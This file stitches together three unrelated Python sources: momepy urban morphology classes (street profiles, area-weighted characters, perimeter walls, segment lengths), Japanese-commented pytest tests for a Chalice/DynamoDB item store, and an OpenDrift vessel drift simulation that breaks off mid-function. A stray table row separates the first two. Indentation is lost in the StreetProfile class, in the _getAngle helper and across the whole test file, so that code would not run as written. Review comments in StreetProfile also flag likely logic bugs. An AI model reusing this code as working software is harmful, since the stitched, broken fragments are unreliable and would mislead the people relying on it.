
    def __init__(self, gdf):
        self.gdf = gdf
        self.series = gdf.geometry.convex_hull.apply(
            lambda hull: _longest_axis(hull.exterior.coords)
        )
class AverageCharacter:
    """
    Calculates the average of a character within a set neighbourhood defined in ``spatial_weights``

    Average value of the character within a set neighbourhood defined in ``spatial_weights``.
    Can be set to ``mean``, ``median`` or ``mode``. ``mean`` is defined as:

    .. math::
        \\frac{1}{n}\\left(\\sum_{i=1}^{n} value_{i}\\right)

    Adapted from :cite:`hausleitner2017`.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing morphological tessellation
    values : str, list, np.array, pd.Series
        the name of the dataframe column, ``np.array``, or ``pd.Series`` where is stored character value.
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index.
    spatial_weights : libpysal.weights
        spatial weights matrix
    rng : Two-element sequence containing floats in range of [0,100], optional
        Percentiles over which to compute the range. Each must be
        between 0 and 100, inclusive. The order of the elements is not important.
    mode : str (default 'all')
        mode of average calculation. Can be set to `all`, `mean`, `median` or `mode` or
        list of any of the options.

    Raises
    ------
    ValueError
        If `mode` (or an entry of a `mode` list) is not one of
        'mean', 'median', 'mode'.

    Attributes
    ----------
    series : Series
        Series containing resulting mean values
    mean : Series
        Series containing resulting mean values
    median : Series
        Series containing resulting median values
    mode : Series
        Series containing resulting mode values
    gdf : GeoDataFrame
        original GeoDataFrame
    values : GeoDataFrame
        Series containing used values
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID
    rng : tuple
        range
    modes : str
        mode

    Examples
    --------
    >>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation, threshold=100, silence_warnings=True, ids='uID')
    >>> tessellation['mean_area'] = momepy.AverageCharacter(tessellation, values='area', spatial_weights=sw, unique_id='uID').mean
    100%|██████████| 144/144 [00:00<00:00, 1433.32it/s]
    >>> tessellation.mean_area[0]
    4823.1334436678835
    """

    def __init__(self, gdf, values, spatial_weights, unique_id, rng=None, mode="all"):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]
        self.rng = rng
        self.modes = mode
        if rng:
            from momepy import limit_range
        data = gdf.copy()
        if values is not None:
            if not isinstance(values, str):
                data["mm_v"] = values
                values = "mm_v"
        self.values = data[values]
        data = data.set_index(unique_id)[values]
        means = []
        medians = []
        modes = []
        allowed = ["mean", "median", "mode"]
        if mode == "all":
            mode = allowed
        elif isinstance(mode, list):
            for m in mode:
                if m not in allowed:
                    # Bug fix: report the offending entry, not the whole list.
                    raise ValueError("{} is not supported as mode.".format(m))
        elif isinstance(mode, str):
            if mode not in allowed:
                raise ValueError("{} is not supported as mode.".format(mode))
            mode = [mode]
        for index in tqdm(data.index, total=data.shape[0]):
            if index in spatial_weights.neighbors.keys():
                neighbours = spatial_weights.neighbors[index].copy()
                if neighbours:
                    # Include the element itself in its own neighbourhood.
                    neighbours.append(index)
            else:
                # No entry in the weights matrix: average over itself only.
                neighbours = [index]
            values_list = data.loc[neighbours]
            if rng:
                # Restrict values to the requested percentile range.
                values_list = limit_range(values_list, rng=rng)
            if "mean" in mode:
                means.append(np.mean(values_list))
            if "median" in mode:
                medians.append(np.median(values_list))
            if "mode" in mode:
                modes.append(sp.stats.mode(values_list)[0][0])
        if "mean" in mode:
            self.series = self.mean = pd.Series(means, index=gdf.index)
        if "median" in mode:
            self.median = pd.Series(medians, index=gdf.index)
        if "mode" in mode:
            self.mode = pd.Series(modes, index=gdf.index)
class StreetProfile:
"""
Calculates the street profile characters.
Returns a dictionary with widths, standard deviation of width, openness, heights,
standard deviation of height and ratio height/width. Algorithm generates perpendicular
lines to ``right`` dataframe features every ``distance`` and measures values on intersection
with features of ``left``. If no feature is reached within
``tick_length`` its value is set as width (being a theoretical maximum).
Derived from :cite:`araldi2019`.
Parameters
----------
left : GeoDataFrame
GeoDataFrame containing streets to analyse
right : GeoDataFrame
GeoDataFrame containing buildings along the streets (only Polygon geometry type is supported)
heights: str, list, np.array, pd.Series (default None)
the name of the buildings dataframe column, ``np.array``, or ``pd.Series`` where is stored building height. If set to None,
height and ratio height/width will not be calculated.
distance : int (default 10)
distance between perpendicular ticks
tick_length : int (default 50)
length of ticks
Attributes
----------
w : Series
Series containing street profile width values
wd : Series
Series containing street profile standard deviation values
o : Series
Series containing street profile openness values
h : Series
Series containing street profile heights values. Returned only when heights is set.
hd : Series
Series containing street profile heights standard deviation values. Returned only when heights is set.
p : Series
Series containing street profile height/width ratio values. Returned only when heights is set.
left : GeoDataFrame
original left GeoDataFrame
right : GeoDataFrame
original right GeoDataFrame
distance : int
distance between perpendicular ticks
tick_length : int
length of ticks
heights : GeoDataFrame
Series containing used height values
Examples
--------
>>> street_profile = momepy.StreetProfile(streets_df, buildings_df, heights='height')
100%|██████████| 33/33 [00:02<00:00, 15.66it/s]
>>> streets_df['width'] = street_profile.w
>>> streets_df['deviations'] = street_profile.wd
"""
def __init__(self, left, right, heights=None, distance=10, tick_length=50):
    """Measure street-profile characters of ``left`` against ``right``.

    For every street segment in ``left``, chainage points are generated
    every ``distance`` units, a pair of perpendicular half-ticks of total
    length ``tick_length`` is cast at each point, and the distances to the
    first building exterior hit on each side are collected.  Aggregates
    (width, width deviation, openness, and optionally height statistics)
    are stored as Series attributes indexed like ``left``.
    """
    self.left = left
    self.right = right
    self.distance = distance
    self.tick_length = tick_length
    if heights is not None:
        if not isinstance(heights, str):
            # heights passed as array-like: copy so the caller's frame is
            # not mutated, then store under a temporary column name
            right = right.copy()
            right["mm_h"] = heights
            heights = "mm_h"
        self.heights = right[heights]
    # spatial index over building geometries for fast bounding-box queries
    sindex = right.sindex
    results_list = []
    deviations_list = []
    heights_list = []
    heights_deviations_list = []
    openness_list = []
    for idx, row in tqdm(left.iterrows(), total=left.shape[0]):
        # list to hold all the point coords
        list_points = []
        # set the current distance to place the point
        current_dist = distance
        # make shapely MultiLineString object
        shapely_line = row.geometry
        # get the total length of the line
        line_length = shapely_line.length
        # append the starting coordinate to the list
        list_points.append(Point(list(shapely_line.coords)[0]))
        # https://nathanw.net/2012/08/05/generating-chainage-distance-nodes-in-qgis/
        # while the current cumulative distance is less than the total length of the line
        while current_dist < line_length:
            # use interpolate and increase the current distance
            list_points.append(shapely_line.interpolate(current_dist))
            current_dist += distance
        # append end coordinate to the list
        list_points.append(Point(list(shapely_line.coords)[-1]))
        # build a [tick1, tick2] pair (one per street side) for every
        # chainage point; enumerate starts at 1 so `num` indexes the *next*
        # point in list_points
        ticks = []
        for num, pt in enumerate(list_points, 1):
            # start chainage 0
            if num == 1:
                angle = self._getAngle(pt, list_points[num])
                line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
                angle = self._getAngle(line_end_1, pt)
                line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
                tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
                ticks.append([tick1, tick2])
            # everything in between
            if num < len(list_points) - 1:
                angle = self._getAngle(pt, list_points[num])
                line_end_1 = self._getPoint1(
                    list_points[num], angle, tick_length / 2
                )
                angle = self._getAngle(line_end_1, list_points[num])
                line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                tick1 = LineString(
                    [
                        (line_end_1.x, line_end_1.y),
                        (list_points[num].x, list_points[num].y),
                    ]
                )
                tick2 = LineString(
                    [
                        (line_end_2.x, line_end_2.y),
                        (list_points[num].x, list_points[num].y),
                    ]
                )
                ticks.append([tick1, tick2])
            # end chainage
            if num == len(list_points):
                angle = self._getAngle(list_points[num - 2], pt)
                line_end_1 = self._getPoint1(pt, angle, tick_length / 2)
                angle = self._getAngle(line_end_1, pt)
                line_end_2 = self._getPoint2(line_end_1, angle, tick_length)
                tick1 = LineString([(line_end_1.x, line_end_1.y), (pt.x, pt.y)])
                tick2 = LineString([(line_end_2.x, line_end_2.y), (pt.x, pt.y)])
                ticks.append([tick1, tick2])
        # widths = []
        # per-street accumulators: nearest-hit distances on each side and
        # heights of the nearest buildings
        m_heights = []
        lefts = []
        rights = []
        for duo in ticks:
            # ix distinguishes the two half-ticks of a pair (0 = left, 1 = right)
            for ix, tick in enumerate(duo):
                possible_intersections_index = list(
                    sindex.intersection(tick.bounds)
                )
                possible_intersections = right.iloc[possible_intersections_index]
                real_intersections = possible_intersections.intersects(tick)
                # NOTE(review): `real_intersections` is a boolean Series but
                # its mask is never applied — `.index` includes candidates
                # that do NOT intersect the tick. Verify against upstream;
                # the empty-geometry filter below partially compensates.
                get_height = right.loc[list(real_intersections.index)]
                possible_int = get_height.exterior.intersection(tick)
                if not possible_int.is_empty.all():
                    true_int = []
                    for one in list(possible_int.index):
                        # NOTE(review): `.type` and direct MultiPoint
                        # iteration are Shapely 1.x idioms (Shapely 2 uses
                        # `.geom_type` and `.geoms`) — confirm pinned version.
                        if possible_int[one].type == "Point":
                            true_int.append(possible_int[one])
                        elif possible_int[one].type == "MultiPoint":
                            for p in possible_int[one]:
                                true_int.append(p)
                    if len(true_int) > 1:
                        # several hits: keep the one closest to the tick's
                        # street-side endpoint (tick.coords[-1])
                        distances = []
                        # NOTE(review): rebinding `ix` here clobbers the
                        # half-tick index from enumerate above; after this
                        # loop ix == len(true_int) >= 2, so the branch below
                        # always appends to `rights`. Looks like a bug —
                        # confirm against upstream before relying on w/wd.
                        ix = 0
                        for p in true_int:
                            dist = p.distance(Point(tick.coords[-1]))
                            distances.append(dist)
                            ix = ix + 1
                        minimal = min(distances)
                        if ix == 0:
                            lefts.append(minimal)
                        else:
                            rights.append(minimal)
                    else:
                        # single intersection: classify by half-tick side
                        if ix == 0:
                            lefts.append(
                                true_int[0].distance(Point(tick.coords[-1]))
                            )
                        else:
                            rights.append(
                                true_int[0].distance(Point(tick.coords[-1]))
                            )
                    if heights is not None:
                        # record height of the candidate building nearest to
                        # the tick origin
                        # NOTE(review): `idx`/`row` shadow the outer loop
                        # variables; harmless here because `shapely_line`
                        # was captured earlier, but fragile.
                        indices = {}
                        for idx, row in get_height.iterrows():
                            dist = row.geometry.distance(Point(tick.coords[-1]))
                            indices[idx] = dist
                        minim = min(indices, key=indices.get)
                        m_heights.append(right.loc[minim][heights])
        # share of half-ticks that hit a building; `ticks * 2` only doubles
        # the list to count half-ticks (== 2 * len(ticks))
        openness = (len(lefts) + len(rights)) / len(ticks * 2)
        openness_list.append(1 - openness)
        # width = 2 * mean one-sided distance; a side with no hits
        # contributes the theoretical maximum tick_length / 2
        if rights and lefts:
            results_list.append(2 * np.mean(lefts + rights))
            deviations_list.append(np.std(lefts + rights))
        elif not lefts and rights:
            results_list.append(2 * np.mean([np.mean(rights), tick_length / 2]))
            deviations_list.append(np.std(rights))
        elif not rights and lefts:
            results_list.append(2 * np.mean([np.mean(lefts), tick_length / 2]))
            deviations_list.append(np.std(lefts))
        else:
            # nothing hit at all: width defaults to the full tick length
            results_list.append(tick_length)
            deviations_list.append(0)
        if heights is not None:
            if m_heights:
                heights_list.append(np.mean(m_heights))
                heights_deviations_list.append(np.std(m_heights))
            else:
                heights_list.append(0)
                heights_deviations_list.append(0)
    self.w = pd.Series(results_list, index=left.index)
    self.wd = pd.Series(deviations_list, index=left.index)
    self.o = pd.Series(openness_list, index=left.index)
    if heights is not None:
        self.h = pd.Series(heights_list, index=left.index)
        self.hd = pd.Series(heights_deviations_list, index=left.index)
        # height-to-width profile ratio
        self.p = self.h / self.w
# http://wikicode.wikidot.com/get-angle-of-line-between-two-points
# https://glenbambrick.com/tag/perpendicular/
# angle between two points
def _getAngle(self, pt1, pt2):
x_diff = pt2.x - pt1.x
y_diff = pt2.y - pt1.y
return math.degrees(math.atan2(y_diff, x_diff))
# start and end points of chainage tick
# get the first end point of a tick
def _getPoint1(self, pt, bearing, dist):
    """Return the point ``dist`` away from ``pt``, perpendicular (+90°) to ``bearing``."""
    theta = math.radians(bearing + 90)
    return Point(pt.x + dist * math.cos(theta), pt.y + dist * math.sin(theta))
# get the second end point of a tick
def _getPoint2(self, pt, bearing, dist):
    """Return the point ``dist`` away from ``pt`` along ``bearing`` (degrees)."""
    theta = math.radians(bearing)
    return Point(pt.x + dist * math.cos(theta), pt.y + dist * math.sin(theta))
class WeightedCharacter:
    """
    Calculates the area-weighted character of each element.

    Each object's character is averaged over the objects within ``k``
    topological steps (captured by ``spatial_weights``), weighting every
    neighbour by its area:

    .. math::
        \\frac{\\sum_{i=1}^{n} {character_{i} * area_{i}}}{\\sum_{i=1}^{n} area_{i}}

    Adapted from :cite:`dibble2017`.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    values : str, list, np.array, pd.Series
        the name of the gdf dataframe column, ``np.array``, or ``pd.Series``
        holding the character to be weighted
    spatial_weights : libpysal.weights
        spatial weights matrix
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index
    areas : str, list, np.array, pd.Series (default None)
        the name of the gdf dataframe column, ``np.array``, or ``pd.Series``
        holding area values; geometry areas are computed when None

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    values : Series
        Series containing used values
    areas : Series
        Series containing used areas
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID

    Examples
    --------
    >>> sw = libpysal.weights.DistanceBand.from_dataframe(tessellation_df, threshold=100, silence_warnings=True)
    >>> buildings_df['w_height_100'] = momepy.WeightedCharacter(buildings_df, values='height', spatial_weights=sw,
    unique_id='uID').series
    100%|██████████| 144/144 [00:00<00:00, 361.60it/s]
    """

    def __init__(self, gdf, values, spatial_weights, unique_id, areas=None):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]

        data = gdf.copy()
        if areas is None:
            # fall back to geometry areas when no explicit weights are given
            areas = gdf.geometry.area

        # normalise array-like inputs into named columns
        if not isinstance(areas, str):
            data["mm_a"] = areas
            areas = "mm_a"
        if not isinstance(values, str):
            data["mm_vals"] = values
            values = "mm_vals"

        self.areas = data[areas]
        self.values = data[values]

        indexed = data.set_index(unique_id)[[values, areas]]

        weighted = []
        for uid in tqdm(indexed.index, total=indexed.shape[0]):
            if uid not in spatial_weights.neighbors:
                # element absent from the weights matrix (e.g. an island)
                weighted.append(np.nan)
                continue
            # the element itself always joins its neighbourhood
            hood = list(spatial_weights.neighbors[uid]) + [uid]
            block = indexed.loc[hood]
            weighted.append(
                sum(block[values] * block[areas]) / sum(block[areas])
            )

        self.series = pd.Series(weighted, index=gdf.index)
class CoveredArea:
    """
    Calculates the total area covered by an element and its neighbours.

    Neighbours are those defined in ``spatial_weights``; the element's own
    area is always included in the sum.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing Polygon geometry
    spatial_weights : libpysal.weights
        spatial weights matrix
    unique_id : str
        name of the column with unique id used as ``spatial_weights`` index

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix
    id : Series
        Series containing used unique ID

    Examples
    --------
    >>> sw = momepy.sw_high(k=3, gdf=tessellation_df, ids='uID')
    >>> tessellation_df['covered3steps'] = mm.CoveredArea(tessellation_df, sw, 'uID').series
    100%|██████████| 144/144 [00:00<00:00, 549.15it/s]
    """

    def __init__(self, gdf, spatial_weights, unique_id):
        self.gdf = gdf
        self.sw = spatial_weights
        self.id = gdf[unique_id]

        # geometry area keyed by unique id for direct neighbour lookup
        cell_area = gdf.set_index(unique_id).geometry.area

        covered = []
        for uid in tqdm(cell_area.index, total=cell_area.shape[0]):
            if uid not in spatial_weights.neighbors:
                covered.append(np.nan)
                continue
            # neighbourhood always includes the element itself
            hood = list(spatial_weights.neighbors[uid]) + [uid]
            covered.append(sum(cell_area.loc[hood]))

        self.series = pd.Series(covered, index=gdf.index)
class PerimeterWall:
    """
    Calculate the perimeter wall length of the joined structure.

    Adjacent buildings (connected components of ``spatial_weights``) are
    dissolved together and every member of a structure receives the
    exterior length of the dissolved footprint.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing objects to analyse
    spatial_weights : libpysal.weights, optional
        spatial weights matrix - If None, Queen contiguity matrix will be
        calculated based on gdf. It is to denote adjacent buildings
        (note: based on index, not ID).

    Attributes
    ----------
    series : Series
        Series containing resulting values
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix

    Examples
    --------
    >>> buildings_df['wall_length'] = mm.PerimeterWall(buildings_df).series
    Calculating spatial weights...
    Spatial weights ready...
    100%|██████████| 144/144 [00:00<00:00, 4171.39it/s]

    Notes
    -----
    It might take a while to compute this character.
    """

    def __init__(self, gdf, spatial_weights=None):
        self.gdf = gdf
        if spatial_weights is None:
            print("Calculating spatial weights...")
            from libpysal.weights import Queen

            spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
            print("Spatial weights ready...")
        self.sw = spatial_weights

        # exterior length shared by every member of a joined structure,
        # keyed by positional index
        walls = {}
        labels = pd.Series(spatial_weights.component_labels, index=range(len(gdf)))
        geom = gdf.geometry

        for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0]):
            if i in walls:
                # already resolved through an earlier member of the structure
                continue
            members = labels[labels == spatial_weights.component_labels[i]].index
            # tiny buffer avoids multipolygons where buildings touch only
            # by their corners
            footprint = geom.iloc[members].buffer(0.01).unary_union
            for member in members:
                walls[member] = footprint.exterior.length

        self.series = pd.Series(
            [walls[i] for i in tqdm(range(gdf.shape[0]), total=gdf.shape[0])],
            index=gdf.index,
        )
class SegmentsLength:
    """
    Calculate the cumulative and/or mean length of segments.

    Sums the length of segments within the topological distance captured
    by ``spatial_weights`` (including each segment itself). With
    ``mean=True`` the mean length is computed as well.

    Parameters
    ----------
    gdf : GeoDataFrame
        GeoDataFrame containing streets (edges) to analyse
    spatial_weights : libpysal.weights, optional
        spatial weights matrix - If None, Queen contiguity matrix will be
        calculated based on streets (note: spatial_weights should be based
        on index, not unique ID).
    mean : boolean, optional
        If mean=False it will compute sum of length, if mean=True it will
        compute sum and mean

    Attributes
    ----------
    series : Series
        Series containing resulting total lengths
    mean : Series
        Series containing resulting mean lengths (only when ``mean=True``)
    sum : Series
        Series containing resulting total lengths
    gdf : GeoDataFrame
        original GeoDataFrame
    sw : libpysal.weights
        spatial weights matrix

    Examples
    --------
    >>> streets_df['length_neighbours'] = mm.SegmentsLength(streets_df, mean=True).mean
    Calculating spatial weights...
    Spatial weights ready...
    """

    def __init__(self, gdf, spatial_weights=None, mean=False):
        self.gdf = gdf
        if spatial_weights is None:
            print("Calculating spatial weights...")
            from libpysal.weights import Queen

            spatial_weights = Queen.from_dataframe(gdf, silence_warnings=True)
            print("Spatial weights ready...")
        self.sw = spatial_weights

        lengths = gdf.geometry.length
        totals = []
        averages = []
        for label in tqdm(gdf.index, total=gdf.shape[0]):
            # segment itself always belongs to its own neighbourhood
            hood = list(spatial_weights.neighbors[label]) + [label]
            # positional lookup: the weights are expected to be index-based
            dims = lengths.iloc[hood]
            if mean:
                averages.append(np.mean(dims))
            totals.append(sum(dims))

        self.series = self.sum = pd.Series(totals, index=gdf.index)
        if mean:
            self.mean = pd.Series(averages, index=gdf.index)
| 33,900 | 9,889 |
import operator
import pytest
from chalice import NotFoundError
import app
from tests.testdata.ddb_items import TESTDATA_DDB_ITEMS
DEFAULT_USERNAME = 'default'
class TestDB:
pass
class TestListAllItems(TestDB):
def test_Return_all_items(self, mock):
"""list_all_items: すべてのアイテムを取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().list_all_items() == TESTDATA_DDB_ITEMS
class TestListItems(TestDB):
def test_Return_items_by_username(self, mock):
"""list_items: ユーザーdefaultのアイテムをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
query = ''
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual = sorted(actual, key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
@pytest.mark.parametrize('query', ['🐈', '🍆'])
def test_Return_items_by_query(self, query, mock):
"""list_items: ユーザーdefaultのアイテムからクエリを満たすものをすべて取得することができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().list_items(query=query, username=DEFAULT_USERNAME)
actual.sort(key=operator.itemgetter('uid'))
expected = [item for item in TESTDATA_DDB_ITEMS
if item['username'] == DEFAULT_USERNAME]
expected = [item for item in expected
if query in item['subject'] or query in item['description']]
expected = sorted(expected, key=operator.itemgetter('uid'))
assert actual == expected
class TestAddItem(TestDB):
@pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
def test_Return_uid_str_cace_subject_description(self, item):
"""add_item: subjectとdescriptionがあるケース、正常にクエリを投げuidを受け取ることができる"""
actual = app.get_app_db().add_item(
subject=item['subject'],
description=item['description'],
username=DEFAULT_USERNAME)
assert type(actual) == str
assert len(actual) == 36
# 以下の状況によりこのテストケースは現時点において実施しない (2020-11-30)
#
# [状況] Amazon DynamoDB 2020-05-18 以降の仕様では、
# 文字列型/バイナリ型の項目について空の文字列「''」を許すようになっている
# 本テストに使用している moto による DynamoDB のモックの仕様は現時点においてまだ追従していないため、
# 空の文字列の登録許さないため、このテストケースを実行するとエラーが発生してしまう
# この状況があてはまらなくなったら、適宜コメントアウトを外し以下のテストケースを実施する
#
# @pytest.mark.parametrize('item', TESTDATA_DDB_ITEMS)
# def test_Return_uid_str_cace_subject_only(self, item):
# """add_item: subjectのみのケース、正常にクエリを投げuidを受け取ることができる"""
# actual = app.get_app_db().add_item(
# subject=item['subject'],
# username=DEFAULT_USERNAME)
# assert type(actual) == str
# assert len(actual) == 36
def test_Raise_case_description_only(self):
"""add_item: descriptionのみのケース、例外を発生させることができる"""
with pytest.raises(TypeError):
app.get_app_db().add_item(
description='',
username=DEFAULT_USERNAME)
class TestGetItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_item(self, mock, item):
"""get_item: uidが存在するケース、itemを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
assert app.get_app_db().get_item(
uid=item['uid'], username=item['username']) == item
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""get_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().get_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestDeleteItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_str(self, mock, item):
"""delete_item: uidが存在するケース、削除したitemのuidを正常に返すことができる"""
mock.table.put_items([item])
assert app.get_app_db().delete_item(
item['uid'], username=item['username']) == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""delete_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().delete_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
class TestUpdateItem(TestDB):
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_all_attributes(self, mock, item):
"""update_item: すべての属性を更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
description=item['description']+"_updated",
state=item['state'],
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_subject_only(self, mock, item):
"""update_item: subjectを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
subject=item['subject']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_description_only(self, mock, item):
"""update_item: descriptionを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
description=item['description']+"_updated",
username=item['username'])
assert actual == item['uid']
@pytest.mark.parametrize("item", TESTDATA_DDB_ITEMS)
def test_Return_uid_case_state_only(self, mock, item):
"""update_item: stateを更新するケース、更新したitemのuidを正常に返すことができる"""
mock.table.put_items(TESTDATA_DDB_ITEMS)
actual = app.get_app_db().update_item(
uid=item['uid'],
state=item['state'],
username=item['username'])
assert actual == item['uid']
def test_Raise_NotFoundError_case_uid_not_exist(self, mock):
"""update_item: uidが存在しないケース、例外を発生させることができる"""
with pytest.raises(NotFoundError):
app.get_app_db().update_item("_NOT_EXIST_UID", username=DEFAULT_USERNAME)
| 6,430 | 2,551 |
#!python
"""Launch vessel drift simulations.
Methodology
-----------
For every week with forcing data, simulated vessels are launched from every cell where
a vessel was present in the AIS data.
The drift angle (up to 60 deg.), windage scaling (2% - 10% of 10 m), and left/right
direction is randomly assigned per simulated vessel.
"""
import datetime
import logging
import time
from dataclasses import dataclass
from pathlib import Path
from typing import List
import numpy as np
import rasterio
from opendrift.models.basemodel import OpenDriftSimulation
from opendrift.models.oceandrift import LagrangianArray
from opendrift.readers import reader_netCDF_CF_generic, reader_shape
from rasterio import warp
logging.basicConfig(level=logging.WARNING)
RANGE_LIMIT_RADS = 60 * np.pi / 180
TIF_DIR = '/mnt/store/data/assets/nps-vessel-spills/ais-data/ais-data-2015-2020/processed_25km/2019/epsg4326'
class Vessel(LagrangianArray):
"""Extend LagrangianArray for use with Alaskan Vessel Drift Project."""
variables = LagrangianArray.add_variables([
(
'wind_scale',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
),
(
'wind_offset',
{
'dtype': np.float32,
'units': '1',
'default': 1
}
)
])
class AlaskaDrift(OpenDriftSimulation):
ElementType = Vessel
required_variables = [
'x_wind',
'y_wind',
'eastward_sea_water_velocity',
'northward_sea_water_velocity',
'eastward_sea_ice_velocity',
'northward_sea_ice_velocity',
'sea_ice_area_fraction',
'land_binary_mask'
]
def seed_elements(
self,
lon,
lat,
radius=0,
number=None,
time=None,
seed=187,
range_limit_rads=RANGE_LIMIT_RADS,
**kwargs
):
if number is None:
number = self.get_config('seed:number_of_elements')
# drift is going to be a random value between 2% - 10% of wind
# (b - a) * random_sample + a
# a = 0.02
# b = 0.1
wind_scale = (0.1 - 0.02) * np.random.random_sample((number,)) + 0.02
# offset is -60 deg. to 60 deg.
# a = -60
# b = 60
# (60 - (-60)) * random_sample + (-60)
wind_offset = (range_limit_rads + range_limit_rads) * np.random.random_sample((number,)) - range_limit_rads # noqa
super(AlaskaDrift, self).seed_elements(
lon=lon,
lat=lat,
radius=radius,
number=number,
time=time,
wind_scale=wind_scale,
wind_offset=wind_offset,
**kwargs
)
def update(self):
"""Update ship position taking into account wind, currents, stokes, and ice."""
# Inspired by `advect_oil`
if hasattr(self.environment, 'sea_ice_area_fraction'):
ice_area_fraction = self.environment.sea_ice_area_fraction
# Above 70%–80% ice cover, the oil moves entirely with the ice.
k_ice = (ice_area_fraction - 0.3) / (0.8 - 0.3)
k_ice[ice_area_fraction < 0.3] = 0
k_ice[ice_area_fraction > 0.8] = 1
factor_stokes = (0.7 - ice_area_fraction) / 0.7
factor_stokes[ice_area_fraction > 0.7] = 0
else:
k_ice = 0
factor_stokes = 1
# 1. update wind
windspeed = np.sqrt(self.environment.x_wind**2 + self.environment.y_wind**2)
windspeed *= self.elements.wind_scale
# update angle using random offset +- 60 deg
# windir is in rads, so need to convert
winddir = np.arctan2(self.environment.y_wind, self.environment.x_wind)
winddir += self.elements.wind_offset
wind_x = windspeed * np.cos(winddir)
wind_y = windspeed * np.sin(winddir)
# Scale wind by ice factor
wind_x = wind_x * (1 - k_ice)
wind_y = wind_y * (1 - k_ice)
self.update_positions(wind_x, wind_y)
# 2. update with sea_water_velocity
# This assumes x_sea_water_velocity and not eastward_sea_water_velocity...
#self.advect_ocean_current(factor=1 - k_ice)
self.update_positions(
self.environment.eastward_sea_water_velocity * (1 - k_ice),
self.environment.northward_sea_water_velocity * (1 - k_ice)
)
# 3. Advect with ice
self.advect_with_sea_ice(factor=k_ice)
# Deactivate elements that hit the land mask
self.deactivate_elements(
self.environment.land_binary_mask == 1,
reason='ship stranded'
)
@dataclass
class SimulationConfig:
"""Configuration for a single OpenDrift simulation"""
start_date: datetime.datetime
readers: List
number: int
radius: float = 25000 # this is meters from given x,y point
time_step: int = 900
time_step_output: int = 3600
duration: datetime.timedelta = datetime.timedelta(days=7)
outfile: str = None
loglevel: int = logging.INFO
def lonlat_from_tif(date, tif_file, dst_crs=rasterio.crs.CRS.from_epsg(4326)):
"""Return (lon, lat) in TIFF with cell value > 0"""
with rasterio.open(tif_file) as ds:
src_crs = ds.crs
idx = np.argwhere(ds.read(1))
x, y = ds.xy(idx[:, 0], idx[:, 1])
lon, lat = warp.transform(
src_crs,
dst_crs,
x,
y
)
# need to change from [-180, 180] to [0, 360]
lon = np.array(lon) % 360
lat = np.array(lat)
return lon, lat
# ~2 min per test
def run_sims_for_date(run_config, tif_dir=TIF_DIR):
vessel_types = ['cargo', 'other', 'passenger', 'tanker']
# Run simulation using data for start date for every vessel type
month = run_config.start_date.month
tif_files = list(Path(tif_dir).glob('*.tif'))
tif_files.sort()
base_fname = run_config.outfile
for vessel_type in vessel_types:
try:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2019*.tif'))[0]
except IndexError:
if month == 12:
tif_file = list(Path(tif_dir).glob(f'{vessel_type}_2019{month:02}01-2020*.tif'))[0]
else:
raise IndexError(f"No AIS data found for {month}")
logging.info(f'Starting simulation preparation for {tif_file=}')
vessel_type = tif_file.name.split('.')[0].split('_')[0]
# prepend out name with vessel type
